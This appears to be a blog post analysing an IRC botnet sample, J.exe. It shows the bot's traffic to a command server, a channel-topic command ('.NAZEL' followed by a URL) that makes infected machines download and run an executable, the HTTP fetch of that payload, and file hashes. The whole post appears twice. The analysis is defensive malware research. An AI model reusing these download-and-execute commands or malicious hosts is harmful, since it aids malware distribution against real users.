J.exe starts us off with a DNS query for lamer.mqbol.com (74.117.174.69) and a TCP connect to it on port 3935. This port is hosting an IRC server which is hosting a botnet channel:
NICK [00|USA|173151]
USER XP-7120 * 0 :LAB2
:li16.centertel.il NOTICE AUTH :*** Looking up your hostname...
:li16.centertel.il NOTICE AUTH :*** Found your hostname
:li16.centertel.il 001 [00|USA|173151]
:li16.centertel.il 002 [00|USA|173151]
:li16.centertel.il 003 [00|USA|173151]
:li16.centertel.il 004 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 422 [00|USA|173151] :MOTD File is missing
:[00|USA|173151] MODE [00|USA|173151] :+iwRG
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
:[00|USA|173151]!XP-7120@my.hostname.net JOIN :##J##
:li16.centertel.il 332 [00|USA|173151] ##J## :.NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
:li16.centertel.il 333 [00|USA|173151] ##J## J4k3r 1268655877
MODE [00|USA|173151] -ix
JOIN ##J##
PRIVMSG ##J## :.::[Download]::. File download: 84.0KB to: cnhfnnv.exe @ 84.0KB/sec.
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PRIVMSG ##J## :.::[Download]::. Failed to create process: "cnhfnnv.exe", error: <267>
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PING :li16.centertel.il
PONG li16.centertel.il
The executive summary for the botnet follows:
Nickname: [00|USA|173151]
Reported hostname of the IRC server: li16.centertel.il
Channel: ##J##
Channel Topic: .NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
Looking at the topic and the failed download messages, J.exe checks the topic for commands and runs them. In this case it tries downloading http://yestube.net/koko.exe (69.4.235.235) and saving it as cnhfnnv.exe:
GET /koko.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: yestube.net
HTTP/1.1 200 OK
Date: Wed, 17 Mar 2010 03:45:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 04 Mar 2010 05:03:10 GMT
ETag: "abe0010-1502b-83e35f80"
Accept-Ranges: bytes
Content-Length: 86059
Content-Type: application/x-msdownload
...
For whatever reason this download didn't work, but koko.exe does looks familiar!
The new koko.exe binary and the old aren't the same:
dennis@ipa:~$ ls -l koko.exe
-rw-r--r-- 1 dennis wheel 86059 Mar 16 22:48 koko.exe
dennis@ipa:~$ md5 koko.exe
MD5 (koko.exe) = 4e9d97f9ff17a2240dafa7d65eef65ca
old:
dennis@ipa:~/projects/exe-sigs/J.exe$ ls -l J.exe
-rw-r--r-- 1 dennis dennis 39424 Mar 16 21:09 J.exe
dennis@ipa:~/projects/exe-sigs/J.exe$ md5 J.exe
MD5 (J.exe) = ce818983eaabca13114fdda012b63dd4
But a quick run through mwanalysis shows it is up to the same tricks of downloading http://193.242.108.49/Dialer_Min/number.asp.
Virustotal
mwanalysis
ThreatExpert
NICK [00|USA|173151]
USER XP-7120 * 0 :LAB2
:li16.centertel.il NOTICE AUTH :*** Looking up your hostname...
:li16.centertel.il NOTICE AUTH :*** Found your hostname
:li16.centertel.il 001 [00|USA|173151]
:li16.centertel.il 002 [00|USA|173151]
:li16.centertel.il 003 [00|USA|173151]
:li16.centertel.il 004 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 422 [00|USA|173151] :MOTD File is missing
:[00|USA|173151] MODE [00|USA|173151] :+iwRG
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
:[00|USA|173151]!XP-7120@my.hostname.net JOIN :##J##
:li16.centertel.il 332 [00|USA|173151] ##J## :.NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
:li16.centertel.il 333 [00|USA|173151] ##J## J4k3r 1268655877
MODE [00|USA|173151] -ix
JOIN ##J##
PRIVMSG ##J## :.::[Download]::. File download: 84.0KB to: cnhfnnv.exe @ 84.0KB/sec.
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PRIVMSG ##J## :.::[Download]::. Failed to create process: "cnhfnnv.exe", error: <267>
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PING :li16.centertel.il
PONG li16.centertel.il
The executive summary for the botnet follows:
Nickname: [00|USA|173151]
Reported hostname of the IRC server: li16.centertel.il
Channel: ##J##
Channel Topic: .NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
Looking at the topic and the failed download messages, J.exe checks the topic for commands and runs them. In this case it tries downloading http://yestube.net/koko.exe (69.4.235.235) and saving it as cnhfnnv.exe:
GET /koko.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: yestube.net
HTTP/1.1 200 OK
Date: Wed, 17 Mar 2010 03:45:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 04 Mar 2010 05:03:10 GMT
ETag: "abe0010-1502b-83e35f80"
Accept-Ranges: bytes
Content-Length: 86059
Content-Type: application/x-msdownload
...
For whatever reason this download didn't work, but koko.exe does looks familiar!
The new koko.exe binary and the old aren't the same:
dennis@ipa:~$ ls -l koko.exe
-rw-r--r-- 1 dennis wheel 86059 Mar 16 22:48 koko.exe
dennis@ipa:~$ md5 koko.exe
MD5 (koko.exe) = 4e9d97f9ff17a2240dafa7d65eef65ca
old:
dennis@ipa:~/projects/exe-sigs/J.exe$ ls -l J.exe
-rw-r--r-- 1 dennis dennis 39424 Mar 16 21:09 J.exe
dennis@ipa:~/projects/exe-sigs/J.exe$ md5 J.exe
MD5 (J.exe) = ce818983eaabca13114fdda012b63dd4
But a quick run through mwanalysis shows it is up to the same tricks of downloading http://193.242.108.49/Dialer_Min/number.asp.
Virustotal
mwanalysis
ThreatExpert
No comments:
Post a Comment